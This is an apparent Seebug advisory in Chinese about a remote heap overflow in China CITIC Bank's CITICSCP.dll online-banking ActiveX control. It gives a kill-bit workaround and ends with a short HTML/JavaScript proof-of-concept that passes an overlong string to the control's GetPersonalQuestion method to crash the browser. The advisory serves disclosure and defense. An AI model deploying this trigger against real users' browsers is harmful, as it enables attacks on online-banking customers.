中信银行CITICSCP.dll网银控件远程堆溢出漏洞

2010-01-06T00:00:00
ID SSV:15190
Type seebug
Reporter Root
Modified 2010-01-06T00:00:00

Description

CITICSCP.dll是使用中信银行的网银时所需安装的ActiveX控件。

CITICSCP.dll文件向系统注册了一个名为IMidInterface的控件接口。该接口主要负责的是银行证书的相关工作,其中包含很多用来操作网上银行证书的函数,如ExportCertificate、ImportPKCS12Certificate等,这些函数中堆溢出漏洞。如果用户受骗访问了恶意网页并向有漏洞的函数传送了超长的字符串类型的参数变量,就可以触发这个溢出,导致安装了中信银行网银控件的系统上浏览器自动崩溃。

中信银行 CITICSCP.dll 临时解决方法:

  • 对CLSID {4BFE8042-A780-452F-AF17-9A424BE31B02}设置kill-bit。

厂商补丁:

中信银行

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://bank.ecitic.com/

                                        
                                            
                                                <object classid="clsid:4BFE8042-A780-452F-AF17-9A424BE31B02" name="evil" ></object>
<script>
var a=Array(1244)+"vvvv"+"dddd"+"cccc"+"nnnn";
evil.GetPersonalQuestion(a);
</script>